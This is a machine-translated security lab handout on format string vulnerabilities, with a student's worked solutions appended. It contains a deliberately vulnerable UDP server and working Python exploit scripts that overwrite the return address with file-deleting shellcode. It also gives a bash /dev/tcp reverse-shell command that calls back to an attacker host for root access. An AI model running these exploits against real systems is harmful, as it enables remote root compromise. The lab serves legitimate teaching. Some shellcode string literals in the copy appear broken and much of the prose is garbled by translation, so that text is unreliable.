Format string vulnerability lab

1 summary

C Medium printf（） Function to print a string according to the format . Its first parameter is called format string, It defines how strings are formatted . Format strings using printf（） Functional % Placeholders for character markers fill in data during printing . The use of format strings is not limited to printf（） function ; Many other functions , Such as sprintf（）、fprintf（） and scanf（）, Format strings are also used . Some programs allow users to provide all or part of the content in a format string . If these contents are not cleared , Malicious users can take advantage of this opportunity to let the program run arbitrary code . A similar problem is called a format string vulnerability .

The goal of this laboratory is to enable students to put into action the knowledge about loopholes learned from the classroom , To gain first-hand experience about format string vulnerabilities . Students will get a program with a format string vulnerability ; Their task is to exploit this vulnerability to achieve the following destruction ：（1） Crash the program ,（2） Read the internal memory of the program ,（3） Modify the internal memory of the program , The most serious ,（4） Inject and execute malicious code with the privileges of the victim program . This laboratory covers the following topics ：

• Format string vulnerability

• Code injection

• Shell code

• Reverse housing

Customized by instructor . The lecturer should pass for DUMMYSIZE Constant select a value to customize this lab , This constant is used when compiling vulnerable programs . Different values can make the solution different . Please select a value between... For this lab 0 and 300 Between the value of the . The laboratory value is ： 100

Reading and video . More about format string attacks , Please refer to the following ：

• Seed book 《 Computer and Internet security ： Practice method 》 The first 6 Chapter , The first 2 edition , Written by Du Wenliang . Please refer to https://www.handsonsecurity.net.

•Udemy Seed lecture No 9 section , Computer security ： Practice method , Du Wenliang . Please refer to https://www.handsonsecurity.net/video.html.

• The laboratory also involves reverse enclosures , See seed Book No 9 Chapter .

Laboratory environment . This laboratory is already in our pre built Ubuntu 16.04 Tested on the virtual machine , It can be downloaded from SEED Web site to download .

2 Experiment task

In order to simplify the tasks in this laboratory , We use the following command to turn off address randomization ：

$ sudo sysctl -w kernel.randomize_va_space=0

2.1 Mission 1： Vulnerable programs

You have received a vulnerable program with format string vulnerability . This program is a server program . When it runs , It listens UDP port 9090. whenever UDP When the packet reaches the port , The program will get the data and call myprintf（） Print data . The server is a root daemon , That is, it runs with root privileges . stay myprintf（） Function , There is a format string vulnerability . We will exploit this vulnerability to gain root privileges .

detailed list 1： Vulnerable server programs server.c（ It can be downloaded from the laboratory website ）

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#define PORT 9090
/* Changing this size will change the layout of the stack. * We have added 2 dummy arrays: in main() and myprintf(). * Instructors can change this value each year, so students * won’t be able to use the solutions from the past. * Suggested value: between 0 and 300 */
#ifndef DUMMY_SIZE
#define DUMMY_SIZE 100
#endif
char *secret = "A secret message\n";
unsigned int target = 0x11223344;
void helper()
{
    
    printf("The address of the secret: 0x%.8x\n", (unsigned) secret);
    printf("The address of the 'target' variable: 0x%.8x\n", 
            (unsigned) &target);
    printf("The value of the 'target' variable (before): 0x%.8x\n", target);
}
void myprintf(char *msg)
{
    
uintptr_t framep;
// Copy the ebp value into framep, and print it out
asm("movl %%ebp, %0" : "=r"(framep));
printf("The ebp value inside myprintf() is: 0x%.8x\n", framep);
/* Change the size of the dummy array to randomize the parameters for this lab. Need to use the array at least once */
char dummy[DUMMY_SIZE]; memset(dummy, 0, DUMMY_SIZE);
// This line has a format string vulnerability
printf(msg);
printf("The value of the ’target’ variable (after): 0x%.8x\n", target);
}
void main()
{
    
struct sockaddr_in server;
struct sockaddr_in client;
int clientLen;
char buf[1500];
/* Change the size of the dummy array to randomize the parameters for this lab. Need to use the array at least once */
char dummy[DUMMY_SIZE]; memset(dummy, 0, DUMMY_SIZE);
printf("The address of the input array: 0x%.8x\n", (unsigned) buf);
helper();
int sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
memset((char *) &server, 0, sizeof(server));
server.sin_family = AF_INET;
server.sin_addr.s_addr = htonl(INADDR_ANY);
server.sin_port = htons(PORT);
if (bind(sock, (struct sockaddr *) &server, sizeof(server)) < 0)
perror("ERROR on binding");
while (1) {
    
bzero(buf, 1500);
recvfrom(sock, buf, 1500-1, 0,
(struct sockaddr *) &client, &clientLen);
myprintf(buf);
}
close(sock);
}

Assemble and compile the above program . You will receive a warning message . This warning message is gcc Countermeasures implemented by the compiler against format string vulnerabilities . We can now ignore this warning message .

// notes ：N Should be replaced by the value set by the instructor

$ gcc -DDUMMY_SIZE=100 -g -z execstack -o server server.c
server.c: In function ’myprintf’:
server.c:13:5: warning: format not a string literal and no format arguments
[-Wformat-security]
printf(msg);

It should be noted that , The program needs to use “-z execstack” Option compilation , This option allows the stack to execute . This option is available for tasks 1 To 5 No impact , But for the task 6 and 7, It is very important . In both tasks , We need to inject malicious code into the stack space of this server program ; If the stack is not executable , Mission 6 and 7 Will fail . Non executable stack is a countermeasure against stack based code injection attacks , But you can use return libc Technology to beat it . To simplify this laboratory , We just need to disable this defeatable countermeasure .

For lecturers . To prevent students from using past solutions （ Or solutions published on the Internet ）, Teachers can ask students to use different DUMMYSIZE Value compiles the server code to change DUMMYSIZE Value . without -DDUMMYSIZE Options ,dummmySize Set to default 100（ Defined in the program ）. When the value changes , The layout of the stack will change , The solution will also be different . Students should ask their teachers N Value .

Run and test the server . The ideal setting for this laboratory is in a VM Run the server on , And then from the other VM attack . however , It is acceptable for students to use a virtual machine in this laboratory . On the server virtual machine , We use root Permission to run the server program . Let's assume that this program is a privileged root daemon . Server listening port 9090. On the client VM On , We can use nc Command sends data to the server , Among them, the sign “-u” Express UDP（ The server program is UDP The server ）. In the following example IP The address should be replaced with the actual address of the server virtual machine IP Address , If the client and server are running on the same virtual machine , Is replaced by 127.0.0.1.

// On the server VM
$ sudo ./server
// On the client VM: send a "hello" message to the server
$ echo hello | nc -u 127.0.0.1 9090
// On the client VM: send the content of badfile to the server
$ nc -u 127.0.0.1 9090 < badfile

You can send any data to the server . The server program should print out anything you send . however , Of the server program myprintf（） A format string vulnerability exists in the function , It allows us to let the server program do more than it should , This includes providing us with root access to the server machine . In the rest of this laboratory , We will exploit this vulnerability .

2.2 Mission 2： Understand the stack layout

In order to succeed in this experiment , stay myprintf（） Call in printf（） Function time , You must understand the stack layout . chart 1 Describes the stack layout . You need to do some research and calculations . We deliberately print some information in the server code , To help simplify the investigation . According to the survey , Students should answer the following questions ：

• problem 1：1,2 and 3 What is the memory address of the tag location ？

First of all, it is obvious that ,③ The marked memory location is the starting location of the array , by 0xbffff0e0,ebp The address is 0xbffff038, that myprintf Your return address is 0xbffff03c(0xbffff038 + 4), That is to say ② Value .

python -c 'print "AAAA"+"%08X."*100' > input1
nc -u 127.0.0.1 9090 < input1

A The corresponding is 0x41, therefore 41414141 after （ Above the figure above ） The data is va_list Pointer from format string Start output on , Output is output , EH , To AAAA 了 , So in other words 41414141 Previous data occupied from format string To buf The beginning of the array , As mentioned earlier ,buf The starting address of the array is 0xbfffe7e0, Like 41414141 Express AAAA equally , For example, in the address ,0x12345678->0x12345679 There is only one letter in this interval A, That is, the two numbers in the figure , Then we just need to count ,AAAA distance 41414141 There are (8x9x7+16x8)/2=316=0x13c, therefore ① The address of is 0xbfffe7e0-0x13c=0xbfffe6a4

( The above address is calculated by me the day before , The next day, the address changed , But the relative address is still the same , Make do with it, HeeHeeHee 0.0)

• problem 2： use 1 and 3 What is the distance between the positions of the marks ？

From the previous question 0x13c

2.3 Mission 3： Crash the program

The goal of this task is to provide input to the server , So when the server program tries to myprintf（） Function to print user input , It will collapse .

2.4 Mission 4： Print out the memory of the server program

The goal of this task is to have the server print out some data from memory . The data will be printed on the server , So the attacker cannot see it . therefore , This is not a meaningful attack , But the technology used in this task is critical to the next task .

chart 1： from myprintf（） Function internal call printf（） Stack layout when .

• Mission 4.A： Stack data . The goal is to print the data on the stack （ Any data can ）. How many format specifiers do you need to provide for the server program to pass %x Print out the first four bytes of input ？

• Mission 4.B： A secret message is stored in the heap area , You know its address ; Your job is to print out the contents of secret information . In order to achieve this goal , You need to send the address of the confidential message （ In binary form ） Put your input （ Format string ）, But it's hard to type binary data in the terminal . We can do this with the following commands .

$ echo $(printf "\x04\xF3\xFF\xBF")%.8x%.8x | nc -u 10.0.2.5 9090
// Or we can save the data in a file 
$ echo $(printf "\x04\xF3\xFF\xBF")%.8x%.8x > badfile
$ nc -u 10.0.2.5 9090 < badfile

It should be noted that , Most computers are small end machines , So store the address in memory 0xAABBCCDD（32 Four bytes on a bit machine ）, Least significant byte 0xDD Stored in a lower address , And the most significant byte 0xAA Stored in a higher address . therefore , When we store the address in the buffer , We need to save the addresses in the following order ：0xDD、0xCC、0xBB, And then there was 0xAA.

Python Code . Because the format string we need to construct may be quite long , So write Python It is more convenient to construct programs . The following example code shows how to construct a string containing binary numbers .

detailed list 2： Sample code buildstring.py（ It can be downloaded from the laboratory website ）

#!/usr/bin/python3
import sys
# Initialize the content array
N = 1500
content = bytearray(0x0 for i in range(N))
# This line shows how to store an integer at offset 0
number = 0x08048870
content[0:4] = (number).to_bytes(4,byteorder='little')
# This line shows how to store a 4-byte string at offset 4
content[4:8] = ("abcd").encode('latin-1')
# This line shows how to construct a string s with
# 12 of "%.8x", concatenated with a "%s"
s = "%.8x"*79 + "%s"
# The line shows how to store the string s at offset 8
fmt = (s).encode('latin-1')
content[8:8+len(fmt)] = fmt
# Write the content to badfile
file = open("badfile", "wb")
file.write(content)
file.close()

Mission 4.A:

The position of the parameters in the stack can be determined by $ To control ,%8x The first four bytes of input can be printed . Print AAAA Value in stack 41414141, The distance is ① and ③ The distance between the positions of （（0x13c-4）/4） +1=79 individual , That is, relative to the first parameter , It's No 79 Parameters

python -c 'print "AAAA%79$8x"' > badfile
nc -u 127.0.0.1 9090 < badfile 

Mission 4.B:

hold secret Address to fill in

The following parameters are also changed to corresponding numbers

2.5 Mission 5： Change the memory of the server program

The goal of this task is to modify the value of the target variable defined in the server program . Its original value is 0x11223344. Suppose this variable contains a significant value , This value affects the control flow of the program . If a remote attacker can change its value , You can change the behavior of this program . We have three sub tasks .

• Mission 5.A： Change the value to another value . In this subtask , We need to change the content of the target variable to something else . If you can change the task to a different value , No matter what the value is , Your tasks are considered successful .

'target’ The address of the variable is 0x0804a044

change number, also s Change the back to %n

• Mission 5.B： Change the value to 0x500. In this subtask , We need to change the contents of the target variable to a specific value 0x500. Only when the value of the variable becomes 0x500 when , Your mission will be considered successful .

0x500 yes 1280 Characters , Already printed 0x280=640 Characters , An extra one is needed %x, That is to say 640+8=648 individual

• Mission 5.C： Change the value to 0xFF990000. This subtask is similar to the previous one , It's just that the target value is now a big number . In format string attacks , This value is printf（） The total number of characters printed by the function ; Printing out so many characters can take hours . You need to use a faster method . The basic idea is use %hn instead of %n, So we can modify the memory space of two bytes , Instead of four bytes . Print out 216 Characters don't take much time . We can divide the memory space of the target variable into two memory blocks , Each memory block has two bytes . We just need to set a block to 0xFF99, Set the other block to 0x0000. This means that in an attack , You need to provide two addresses in the format string .

In the format string attack , Changing the contents of the memory space to a very small value is very challenging （ Please explain the reason in the report ）;0x00 It is an extreme case . To achieve this goal , We need to use overflow Technology . The basic idea is , When we make a number larger than the value allowed in the storage , Only the lower part of the number is stored （ Basically , There is an integer overflow ）. for example , If the number 216+5 Stored in 16 Bit memory space , Store only 5. therefore , To get zero , We just need to get 216=65536 The number of .

0xFF99=65433, The other value is 65535, The values written to variables are cumulative , So let's start with the smaller . Get rid of the previous 78x9 and 12 There is still left 65433 - 78 * 9 - 12 = 64718 , And the second value is just 65536 - 65433 = 103 了

#!/usr/bin/python3
import sys
# Initialize the content array
N = 1500
content = bytearray(0x0 for i in range(N))
# This line shows how to store an integer at offset 0
number = 0x0804a046
number1 = 0x0804a044
content[0:4] = (number).to_bytes(4,byteorder='little')
# This line shows how to store a 4-byte string at offset 4
content[4:8] = ("abcd").encode('latin-1')
# This line shows how to construct a string s with
# 12 of "%.8x", concatenated with a "%s"
content[8:12] = (number1).to_bytes(4,byteorder='little')
s = "%.8x"*78 +"%.64719x" + "%hn" + "%.103x" + "%hn"
# The line shows how to store the string s at offset 8
fmt = (s).encode('latin-1')
content[12:12+len(fmt)] = fmt
# Write the content to badfile
file = open("badfile", "wb")
file.write(content)
file.close()

2.6 Mission 6： Inject malicious code into the server program

Now? , We are ready to track the crown jewel of this attack , in other words , Inject a piece of malicious code into the server program , So we can delete a file from the server . This task will lay the foundation for our next task , That is, full control of the server computer .

To perform this task , We need to inject a piece of malicious code in binary format into the server memory , Then use the format string vulnerability to modify the return address field of the function , So when the function returns , It will jump to the code we injected . To delete a file , We want malicious code to use shell Program （ Such as /bin/bash） perform /bin/rm command . This type of code is called shell code .

/bin/bash -c "/bin/rm /tmp/myfile"

We need to use execve（） The system call executes the above shell code command , It means to execve（） Provide the following parameters ：

execve(address to the "/bin/bash" string, address to argv[], 0),
where argv[0] = address of the "/bin/bash" string,
argv[1] = address of the "-c" string,
argv[2] = address of the "/bin/rm /tmp/myfile" string,
argv[3] = 0

We need to write machine code to call execve（） system call , This involves calling “int 0x80” The following four registers are set before the instruction .

eax = 0x0B (execve()’s system call number)
ebx = address of the "/bin/bash" string (argument 1)
ecx = address of argv[] (argument 2)
edx = 0 (argument 3, for environment variables; we set it to NULL)

Setting these four registers in the shell code is very challenging , Mainly because there can't be any zeros in the code （ Zero terminated string in string ）. We provide the shell code below . A detailed explanation of the shell code can be found in the buffer overflow lab and the seed book （ The second edition ） Of the 4.7 Found in Chapter .

detailed list 3:serverexploitskeleton.py Shell code in （ It can be downloaded from the laboratory website ）

# The following code runs "/bin/bash -c ’/bin/rm /tmp/myfile’"
malicious_code= (
# Push the command ’/binbash’ into stack ( is equivalent to /)
"\x31\xc0" # xorl %eax,%eax
"\x50" # pushl %eax
"\x68""bash" # pushl "bash"
"\x68""" # pushl ""
"\x68""/bin" # pushl "/bin"
"\x89\xe3" # movl %esp, %ebx
# Push the 1st argument ’-ccc’ into stack (-ccc is equivalent to -c)
"\x31\xc0" # xorl %eax,%eax
"\x50" # pushl %eax
"\x68""-ccc" # pushl "-ccc"
"\x89\xe0" # movl %esp, %eax
# Push the 2nd argument into the stack:
# ’/bin/rm /tmp/myfile’
# Students need to use their own VM’s IP address
"\x31\xd2" # xorl %edx,%edx
"\x52" # pushl %edx
"\x68"" " # pushl (an integer) *
"\x68""ile " # pushl (an integer)
"\x68""/myf" # pushl (an integer)
"\x68""/tmp" # pushl (an integer)
"\x68""/rm " # pushl (an integer)
"\x68""/bin" # pushl (an integer) *
"\x89\xe2" # movl %esp,%edx
# Construct the argv[] array and set ecx
"\x31\xc9" # xorl %ecx,%ecx
"\x51" # pushl %ecx
"\x52" # pushl %edx
"\x50" # pushl %eax
"\x53" # pushl %ebx
"\x89\xe1" # movl %esp,%ecx
# Set edx to 0
"\x31\xd2" #xorl %edx,%edx
# Invoke the system call
"\x31\xc0" # xorl %eax,%eax
"\xb0\x0b" # movb $0x0b,%al
"\xcd\x80" # int $0x80
).encode(’latin-1’)

You need to pay attention to 1 Xing He 2 Code between lines . That's what we're going to do /bin/rm Where the command string is pushed onto the stack . In this mission , You do not need to modify this part , But for the next task , You really need to modify it .pushl The instruction can only 32 Bit integers are pushed onto the stack ; That's why we divide the string into several 4 Blocks of bytes . Because this is a shell command , Adding extra spaces does not change the meaning of the command ; therefore , If the length of the string cannot be divided by four , You can always add extra spaces . The stack grows from high address to low address （ That is the reverse ）, So we need to push the string back onto the stack .

In shell code , When we will “/bin/bash” When stored on the stack , We store “/bin///bash”, Its length is 12, yes 4 Multiple .execve（） Will ignore additional “/”. Similarly , When we will “-c” When stored on the stack , We store “-ccc”, Increase the length to 4. about bash, These extra c Considered redundant .

Please construct your input , Provide it to the server program , And demonstrate that you can successfully delete the target file . In the laboratory report , You need to explain how the format string is constructed . Please look at the picture 1 Mark the storage location of malicious code in （ Please provide the specific address ）.

exp：

#!/usr/bin/python3
import sys
# The following code runs "/bin/bash -c ’/bin/rm /tmp/myfile’"
malicious_code= (
# Push the command '/binbash' into stack ( is equivalent to /)
    "\x31\xc0"                      # xorl %eax,%eax
    "\x50"                          # pushl %eax
    "\x68""bash"                    # pushl "bash"
    "\x68"""                    # pushl ""
    "\x68""/bin"                    # pushl "/bin"
    "\x89\xe3"                      # movl %esp, %ebx 

    # Push the 1st argument '-ccc' into stack (-ccc is equivalent to -c)
    "\x31\xc0"                      # xorl %eax,%eax
    "\x50"                          # pushl %eax
    "\x68""-ccc"                    # pushl "-ccc"
    "\x89\xe0"                      # movl %esp, %eax

    # Push the 2nd argument into the stack:
    # '/bin/rm /tmp/myfile' 
    # Students need to use their own VM's IP address
    "\x31\xd2"                      # xorl %edx,%edx
    "\x52"                          # pushl %edx
    "\x68"" "                    # pushl (an integer)
    "\x68""ile "                    # pushl (an integer)
    "\x68""/myf"                    # pushl (an integer)
    "\x68""/tmp"                    # pushl (an integer)
    "\x68""/rm "                    # pushl (an integer)
    "\x68""/bin"                    # pushl (an integer)
    "\x89\xe2"                      # movl %esp,%edx

    # Construct the argv[] array and set ecx
    "\x31\xc9"                      # xorl %ecx,%ecx
    "\x51"                          # pushl %ecx
    "\x52"                          # pushl %edx
    "\x50"                          # pushl %eax
    "\x53"                          # pushl %ebx
    "\x89\xe1"                      # movl %esp,%ecx 

    # Set edx to 0
    "\x31\xd2"                      #xorl %edx,%edx 

    # Invoke the system call
    "\x31\xc0"                      # xorl %eax,%eax
    "\xb0\x0b"                      # movb $0x0b,%al 
    "\xcd\x80"                      # int $0x80
).encode('latin-1')
N=1200
content=bytearray(0x90 for i in range(N))
# This line shows how to store an integer at offset 0
start = N -len(malicious_code)
content[start:] = malicious_code
number = 0xbfffe73e
content[0:4] = (number).to_bytes(4,byteorder='little')
# This line shows how to store a 4-byte string at offset 4
content[4:8] = ("abcd").encode('latin-1')
# This line shows how to construct a string s with
# 12 of "%.8x", concatenated with a "%s"
number2 = 0xbfffe73c
content[8:12] = (number2).to_bytes(4,byteorder='little')
small=0xbfff-12-78*8
large=0xe73c+78*8+32-0xbfff
#s = "%.8x"*78 + "%.48515x"+"%hn"+"%.10353x"+"%hn"
s = "%.8x"*78 + "%." + str(small)+"x%hn"+"%." + str(large) +"x%hn"
# The line shows how to store the string s at offset 8
fmt = (s).encode('latin-1')
content[12:12+len(fmt)] = fmt
# Write the content to badfile
file = open("badfile", "wb")
file.write(content)
file.close()

2.7 Mission 7： Get reverse shell

When an attacker can inject commands into the victim's machine , They are not interested in running a simple command on the victim's machine ; They are more interested in running many commands . What the attacker wants to achieve is to use the attack to establish a back door , In this way, they can use this back door to facilitate further damage .

A typical way to set up a back door is to reverse the operation of the victim machine shell, Allow an attacker to access the victim machine .Reverse shell Is a running on a remote computer shell process , Connect back to the attacker's computer . This provides a convenient method for attackers , Once the remote computer is threatened , You can access it . Seed book （ The second edition ） The first 9 Chapter provides an explanation of how the reverse Housing Works . It can also be in Shellshock Attack the lab and TCP The guidelines for attacking the laboratory can be found in .

To get the reverse shell, We need to run on the attacker machine first TCP The server . This server is waiting for our malicious code to call back from the victim server computer . following nc Command to create a listening port 7070 Of TCP The server ：

$ nc -l 7070 -v

You need to modify the manifest 3 Shell codes listed in , So shell code does not use bash function /bin/rm command , Instead, run the following command . This example assumes that the attacker's computer IP The address is 10.0.2.6, So you need to change... In your code IP Address ：

/bin/bash -c "/bin/bash -i > /dev/tcp/10.0.2.6/7070 0<&1 2>&1"

You only need to modify section 1 Xing He 2 Code between lines , So the above “/bin/bash-i…” Commands are executed by shell code , instead of /bin/rm command . After completing the shell code , The format string should be constructed , And send it as input to the victim server . If your attack succeeds , Your TCP The server will get a callback , And you will get the root on the victim's computer shell. Please provide evidence of success in the report （ Include screenshots ）.

exp1.py:( Copy exp.py File modification part of the code 、 fill /bin/bash -c “/bin/bash -i > /dev/tcp/127.0.0.1/7070 0&1”

#!/usr/bin/python3
import sys
# The following code runs "/bin/bash -c ’/bin/rm /tmp/myfile’"
malicious_code= (
# Push the command '/binbash' into stack ( is equivalent to /)
    "\x31\xc0"                      # xorl %eax,%eax
    "\x50"                          # pushl %eax
    "\x68""bash"                    # pushl "bash"
    "\x68"""                    # pushl ""
    "\x68""/bin"                    # pushl "/bin"
    "\x89\xe3"                      # movl %esp, %ebx 

    # Push the 1st argument '-ccc' into stack (-ccc is equivalent to -c)
    "\x31\xc0"                      # xorl %eax,%eax
    "\x50"                          # pushl %eax
    "\x68""-ccc"                    # pushl "-ccc"
    "\x89\xe0"                      # movl %esp, %eax

    # Push the 2nd argument into the stack:
    # '/bin/rm /tmp/myfile' 
    # Students need to use their own VM's IP address
    "\x31\xd2"                      # xorl %edx,%edx
    "\x52"                          # pushl %edx
    "\x68"" "                    # pushl (an integer)
    "\x68""ile "                    # pushl (an integer)
    "\x68""/myf"                    # pushl (an integer)
    "\x68""/tmp"                    # pushl (an integer)
    "\x68""/rm "                    # pushl (an integer)
    "\x68""/bin"                    # pushl (an integer)
    "\x89\xe2"                      # movl %esp,%edx

    # Construct the argv[] array and set ecx
    "\x31\xc9"                      # xorl %ecx,%ecx
    "\x51"                          # pushl %ecx
    "\x52"                          # pushl %edx
    "\x50"                          # pushl %eax
    "\x53"                          # pushl %ebx
    "\x89\xe1"                      # movl %esp,%ecx 

    # Set edx to 0
    "\x31\xd2"                      #xorl %edx,%edx 

    # Invoke the system call
    "\x31\xc0"                      # xorl %eax,%eax
    "\xb0\x0b"                      # movb $0x0b,%al 
    "\xcd\x80"                      # int $0x80
).encode('latin-1')
N=1200
content=bytearray(0x90 for i in range(N))
# This line shows how to store an integer at offset 0
start = N -len(malicious_code)
content[start:] = malicious_code
number = 0xbffff03e
content[0:4] = (number).to_bytes(4,byteorder='little')
# This line shows how to store a 4-byte string at offset 4
content[4:8] = ("abcd").encode('latin-1')
# This line shows how to construct a string s with
# 12 of "%.8x", concatenated with a "%s"
number2 = 0xbffff03c
content[8:12] = (number2).to_bytes(4,byteorder='little')
small=0xbfff-12-78*8
large=0xf03c+78*8+32-0xbfff
#s = "%.8x"*78 + "%.48515x"+"%hn"+"%.10353x"+"%hn"
s = "%.8x"*78 + "%." + str(small)+"x%hn"+"%." + str(large) +"x%hn"
# The line shows how to store the string s at offset 8
fmt = (s).encode('latin-1')
content[12:12+len(fmt)] = fmt
# Write the content to badfile
file = open("badfile", "wb")
file.write(content)
file.close()

Open three terminals , A monitor 7070 port 、 Open a server server Program 、 A compiler exp.py Post send badfile File to server ：

2.8 Mission 8： solve the problem

Remember gcc Compiler generated warning messages ？ Please explain what it means . Please fix the vulnerability in the server program , Then recompile . Did the compiler warning disappear ？ Is your attack still valid ？ You only need to try one attack , To see if it is still valid .

Before repair ：

Repair ：printf(msg) Change it to printf("%s",msg)

After repair ：